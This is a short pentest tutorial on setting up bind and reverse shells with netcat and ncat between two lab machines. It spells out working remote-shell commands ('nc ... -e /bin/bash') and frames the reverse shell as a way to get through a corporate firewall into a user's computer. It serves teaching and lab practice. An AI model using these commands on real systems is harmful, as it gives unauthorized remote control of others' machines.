HOWTO Using Bind Shell and Reverse Shell

Now let’s review on how to use Bind Shell and Reverse Shell. You need to have two workstation for this exercise, the 1st PC (InsiderPC with IP 192.168.10.100) is in your network and the 2nd PC (OutsiderPC with IP 192.168.10.200) from the outside network.

Using Bind Shell, start this command from your OutsiderPC (Bob workstation).

KING.NET.PenTest.Using.Kali.BindShell
KING.NET.PenTest.Using.Kali.BindShell

nc -nvlp 5555 -e /bin/bash ;starting netcat with listening port 5555, of course you can use other port number and allowing the client (InsiderPC) to connect and execute bash shell command prompt. This is to prepare Bob’s workstation to listen using port 5555 so Alice can connect.

From the InsiderPC (Alice workstation), connect using the following command

nc -nv 192.168.10.200 5555 [Enter] the IP address is assigned to the OutsiderPC.

When you type “ifconfig” you will see the IP address of OutsiderPC. You are executing this command from the OutsiderPC.

This is to allow Alice to connect to Bob’s workstation to take control for administration purposes.

Now Reserve Shell. The difference is the client (InsiderPC) will provide the executable

KING.NET.PenTest.Using.Kali.ReverseShell
KING.NET.PenTest.Using.Kali.ReverseShell

file. Let’s begin by preparing our OutsiderPC to listen. In OutsiderPC, type the following command.

nc -nvlp 5555

From the InsiderPC, connect using the following command.

nc -nv 192.168.10.200 5555 -e /bin/bash [Enter] the IP address is assigned to the OutsiderPC (Bob’s workstation).

Alice is located in the corporate network with Firewall, she will not be able to accept connection coming from outside (Bob) though Alice can make outbound connection which allow her to connect to Bob’s workstation with the NETCAT connection tied to a local shell. Once this connection is made, Bob then will have access to Alice computer an her behalf. Similar to a remote access tool.

Using the OutsiderPC, type “ifconfig” you will see the InsiderPC ip address because you are using the InsiderPC (Alice) to execute the command.

Related: Learn Penetration Testing using Kali

Please note, using netcat is not encrypted. All transactions are in plain text. The NCAT tool will provide the encryption not available in netcat command. It’s a similar process when you use bind shell or reverse shell.

UPDATED: Here’s the command using NCAT encrypted session for bind shell.

# ncat -lvp 5555 -e /bin/bash –allow 192.168.2.100 –ssl

where as -lvp listening to port 5555, -e /bin/bash (or -e cmd.exe for windows) bind shell, to –allow remote IP address to connect and using –ssl to encrypt the session.

To connect from remote PC with an IP address of 192.168.2.100, use the following command.

# ncat -v 192.168.2.200 5555 –ssl

where as to connect to 192.168.2.200 remote PC that give us permission using port 5555 and –ssl for encrypted session.

And for the reverse bind shell, use these commands.

PC1 # ncat -lvp 5555 –allow 192.168.2.100 –ssl

PC2 # ncat -v 192.168.2.200 5555 -e /bin/bash –ssl

You can use Wireshark or other snipping network traffic tool to check if your session is encrypted.

Always encrypt. Always secure.

EM @QUE.COM

Founder, QUE.COM Game Studios. | Founder, Yehey.com a Shout for Joy! |
MAJ.COM Management of Assets and Joint Venture |

More at KING.NET Ideas to Life | Network of Innovation |

Send your Tip to my Bitcoin/Ethereum or other crypto currency.

Leave a Reply